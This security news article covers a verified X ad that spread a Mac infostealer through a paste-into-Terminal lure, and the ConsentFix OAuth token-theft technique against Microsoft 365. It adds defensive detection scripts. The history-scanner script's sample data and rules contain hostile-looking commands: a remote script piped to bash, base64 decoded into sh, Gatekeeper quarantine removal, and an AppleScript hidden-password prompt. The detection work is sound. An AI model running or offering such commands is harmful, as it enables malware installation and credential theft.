GBHackers

Verified X Sponsored Ad Spreads Mac Malware While ConsentFix Hijacks Microsoft 365 Accounts


Two threats are documented here side by side: a Mac-targeting ClickFix campaign amplified through a verified X sponsored ad, and a novel browser-based hijack technique called ConsentFix that exfiltrates Microsoft 365 session tokens without traditional malware.

Researchers at Jamf and Malwarebytes tracked the X incident, in which a verified account ran a sponsored advertisement promoting a macOS utility dubbed “DynamicLake”, a lookalike of legitimate Dynamic Island utilities.

The ad redirected visitors to a clone domain, dynamicmacisland[.]com, which instructed users to open Terminal and paste a command that the page had already placed on their clipboard. That single user action silently installed an infostealer from a family related to Atomic Stealer.

The campaign leverages three converging tactics: convincing ClickFix-style social engineering that asks users to execute Terminal commands, visually authentic lookalike domains that mimic trusted apps, and paid advertising to scale reach and impart credibility via verification badges.

This attack is notable because it weaponizes the user’s own trust in platform signals: verified account status and paid placement.

Historically, ClickFix campaigns relied on phony “human verification” flows; this iteration couples that social engineering with macOS-specific command-line installs that evade many endpoint protections because the user explicitly invokes Terminal.

The result is effective distribution of macOS infostealers without malicious attachments or drive-by exploits.
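The Terminal-paste step described above leaves a trace that defenders can look for: the pasted one-liner ends up in the user's shell history. The following script, an added illustration rather than code from Jamf or Malwarebytes, scans zsh history for the shapes such commands typically take. The regexes, the sample history, and the example.invalid URL are assumptions about the pattern; the actual command used in the campaign is not reproduced here.

```python
"""Flag ClickFix-style shell one-liners in a macOS user's shell history.

Added illustration, not code from Jamf or Malwarebytes. The rules and the
sample history are assumptions about what a pasted install command tends
to look like (remote script piped into a shell, base64-decoded payload,
Gatekeeper quarantine removal, AppleScript password prompt), not the
command used in the DynamicLake campaign.
"""
import re
from typing import Dict, List

# Constructed zsh history in EXTENDED_HISTORY format (": <epoch>:<duration>;<cmd>").
# In the real lure the URL pointed at the lookalike domain; example.invalid is a placeholder.
SAMPLE_HISTORY = """\
: 1700000001:0;ls -la ~/Downloads
: 1700000002:0;git status
: 1700000003:0;curl -fsSL https://example.invalid/install.sh | bash
: 1700000004:0;echo "ZWNobyBoaQo=" | base64 -d | sh
: 1700000005:0;xattr -d com.apple.quarantine ~/Downloads/DynamicLake.app
: 1700000006:0;brew install wget
: 1700000007:0;osascript -e 'display dialog "Enter your password" default answer "" with hidden answer'
"""

# A pipe into an interactive shell, optionally via sudo.
_PIPE_TO_SHELL = r"\|\s*(?:sudo\s+)?(?:bash|zsh|sh)\b"

RULES: Dict[str, "re.Pattern[str]"] = {
    # curl/wget output fed straight into a shell: the classic ClickFix install line.
    "remote_script_piped_to_shell": re.compile(r"\b(?:curl|wget)\b.*" + _PIPE_TO_SHELL),
    # Obfuscated payload decoded on the fly and executed.
    "base64_decoded_to_shell": re.compile(r"base64\s+(?:-d|-D|--decode)\s*" + _PIPE_TO_SHELL),
    # Stripping the quarantine attribute so Gatekeeper does not prompt.
    "quarantine_attribute_removed": re.compile(r"\bxattr\b.*(?:com\.apple\.quarantine|\s-c\b)"),
    # AppleScript dialog collecting a hidden password (a common stealer prompt).
    "applescript_password_prompt": re.compile(r"\bosascript\b.*hidden answer"),
}


def strip_zsh_prefix(line: str) -> str:
    """Drop the ': <epoch>:<duration>;' prefix zsh writes with EXTENDED_HISTORY."""
    m = re.match(r"^: \d+:\d+;(.*)$", line)
    return m.group(1) if m else line


def classify_command(cmd: str) -> List[str]:
    """Return the names of every rule the command matches (empty if benign)."""
    return [name for name, rx in RULES.items() if rx.search(cmd)]


def scan_history(text: str) -> List[Dict[str, object]]:
    """Return one record per suspicious line: line number, command, matched rules."""
    hits: List[Dict[str, object]] = []
    for n, raw in enumerate(text.splitlines(), start=1):
        cmd = strip_zsh_prefix(raw)
        rules = classify_command(cmd)
        if rules:
            hits.append({"line": n, "command": cmd, "rules": rules})
    return hits


if __name__ == "__main__":
    import pathlib
    import sys

    # Pass a path such as ~/.zsh_history to scan a real file; otherwise use the sample.
    text = (pathlib.Path(sys.argv[1]).expanduser().read_text(errors="replace")
            if len(sys.argv) > 1 else SAMPLE_HISTORY)
    for h in scan_history(text):
        print(f"line {h['line']}: {', '.join(h['rules'])}\n    {h['command']}")
```

On the constructed sample this flags lines 3, 4, 5 and 7 and leaves the `brew install wget` line alone, because that rule requires the download to be piped into a shell. Shell history is written only when the shell exits and is trivially editable, so this is a hunting aid, not a control; a real deployment would feed the same rules from process-execution telemetry instead.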

Jamf’s disclosure and the subsequent takedown of the ad, described in a report the company shared with GBHackers, underscore that platform vetting and automated ad screening can be circumvented when adversaries craft benign-looking creatives and target legitimate ad pipelines.

In parallel, Microsoft 365 users face ConsentFix, a refined account-takeover technique that removes the need for malware or password theft.

Reported by BleepingComputer and analyzed by incident responders, ConsentFix manipulates the browser and OAuth flows so that victims inadvertently hand over session tokens.

An initial lure, often a link hosted on a trusted service such as Dropbox and sometimes password-protected to evade automated inspection, presents a convincing Microsoft sign-in prompt.

How the ConsentFix trap looks (Source: Malwarebytes).

The user is then instructed to perform an unusual but plausible action, such as dragging a localhost callback link into the browser.

Within seconds the attacker receives the tokens carried by that callback and can access OneDrive, Teams, and other Microsoft 365 services, without the victim ever typing credentials into an attacker-controlled page and without the attacker needing to defeat MFA.

ConsentFix is dangerous because it subverts standard security awareness defenses: users do not enter passwords, do not install software, and do not trigger traditional policy alerts.

The technique has begun circulating on Russian-language cybercrime forums, lowering the bar for less seasoned threat actors and increasing likely volume.

Defensive posture against these threats requires both technical and behavioral measures. For endpoints, restrict or monitor clipboard-to-Terminal installation patterns (for example, remote scripts piped straight into a shell), and enforce application allowlists and managed controls over kernel and system extensions on macOS.

For cloud, strengthen Conditional Access policies, constrain token lifetimes, and monitor for anomalous OAuth consent and token-issuance events.
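The handoff described in the ConsentFix section above, where the victim signs in from one network and the attacker redeems the callback from another, produces a recognisable shape in sign-in telemetry: an interactive sign-in for a user and application, followed within minutes by non-interactive token use for the same user and application from a different IP. The script below correlates records on that basis. It is an added illustration, not code from BleepingComputer or Malwarebytes; the field names follow the Microsoft Graph signIn resource, but the records, user names, application name, addresses and the 10-minute window are all constructed assumptions.

```python
"""Correlate sign-in records to surface a ConsentFix-style token handoff.

Added illustration, not code from BleepingComputer or Malwarebytes. Field names
follow the Microsoft Graph signIn resource (userPrincipalName, appDisplayName,
ipAddress, isInteractive, createdDateTime). The records, identities, addresses
and the 10-minute window below are constructed assumptions for the example.
"""
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed sign-in records. "Dev CLI" stands in for whatever legitimate
# public-client application the lure abuses; it is not a real app name.
SAMPLE_SIGNINS: List[Dict[str, object]] = [
    # Victim completes a genuine interactive sign-in from the corporate egress IP ...
    {"userPrincipalName": "alice@example.invalid", "appDisplayName": "Dev CLI",
     "ipAddress": "203.0.113.10", "isInteractive": True,
     "createdDateTime": "2025-01-15T09:00:00Z"},
    # ... and four minutes later the same user+app is used from another network (the handoff).
    {"userPrincipalName": "alice@example.invalid", "appDisplayName": "Dev CLI",
     "ipAddress": "198.51.100.77", "isInteractive": False,
     "createdDateTime": "2025-01-15T09:04:00Z"},
    # Benign: another user, token use from the same IP as the sign-in.
    {"userPrincipalName": "bob@example.invalid", "appDisplayName": "Dev CLI",
     "ipAddress": "203.0.113.10", "isInteractive": True,
     "createdDateTime": "2025-01-15T09:10:00Z"},
    {"userPrincipalName": "bob@example.invalid", "appDisplayName": "Dev CLI",
     "ipAddress": "203.0.113.10", "isInteractive": False,
     "createdDateTime": "2025-01-15T09:12:00Z"},
    # Benign: a new IP hours later (e.g. working from home), outside the window.
    {"userPrincipalName": "bob@example.invalid", "appDisplayName": "Dev CLI",
     "ipAddress": "192.0.2.5", "isInteractive": False,
     "createdDateTime": "2025-01-15T18:00:00Z"},
]


def parse_ts(value: str) -> datetime:
    """Parse the UTC timestamp format used in the sample records."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def find_token_handoffs(events: List[Dict[str, object]],
                        window: timedelta = timedelta(minutes=10)) -> List[Dict[str, object]]:
    """Return one alert per interactive sign-in that is followed, within `window`,
    by non-interactive token use for the same user and app from a different IP."""
    by_key: Dict[Tuple[str, str], List[Dict[str, object]]] = {}
    for e in sorted(events, key=lambda e: str(e["createdDateTime"])):
        key = (str(e["userPrincipalName"]), str(e["appDisplayName"]))
        by_key.setdefault(key, []).append(e)

    alerts: List[Dict[str, object]] = []
    for (user, app), evs in by_key.items():
        for i, first in enumerate(evs):
            if not first["isInteractive"]:
                continue
            t0 = parse_ts(str(first["createdDateTime"]))
            for later in evs[i + 1:]:
                elapsed = parse_ts(str(later["createdDateTime"])) - t0
                if elapsed > window:
                    break  # records are time-ordered, so nothing later can qualify
                if not later["isInteractive"] and later["ipAddress"] != first["ipAddress"]:
                    alerts.append({
                        "user": user,
                        "app": app,
                        "signin_ip": first["ipAddress"],
                        "token_ip": later["ipAddress"],
                        "seconds_after_signin": int(elapsed.total_seconds()),
                    })
    return alerts


if __name__ == "__main__":
    for a in find_token_handoffs(SAMPLE_SIGNINS):
        print(f"{a['user']} / {a['app']}: signed in from {a['signin_ip']}, "
              f"token used from {a['token_ip']} {a['seconds_after_signin']}s later")
```

On the constructed data this raises exactly one alert, for alice. A raw IP comparison will also fire on mobile users and split-tunnel VPNs, so in production the comparison should be made on ASN or named location rather than the literal address, and the alert should be enriched with the resource the token was used against (OneDrive or Teams in the cases described above) before it reaches an analyst.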

On the human side, train employees to treat unexpected verification steps and drag-and-drop browser actions as red flags, scrutinize short-lived or password-protected links hosted on third-party platforms, and verify ads and social posts through independent channels before acting.

These incidents reiterate a core lesson: platform-provided signals (verified badges, paid placements, and familiar sign-in screens) are not guarantees of legitimacy. Link-level inspection by security teams, tighter ad vetting by platforms, and rapid reporting procedures remain essential.

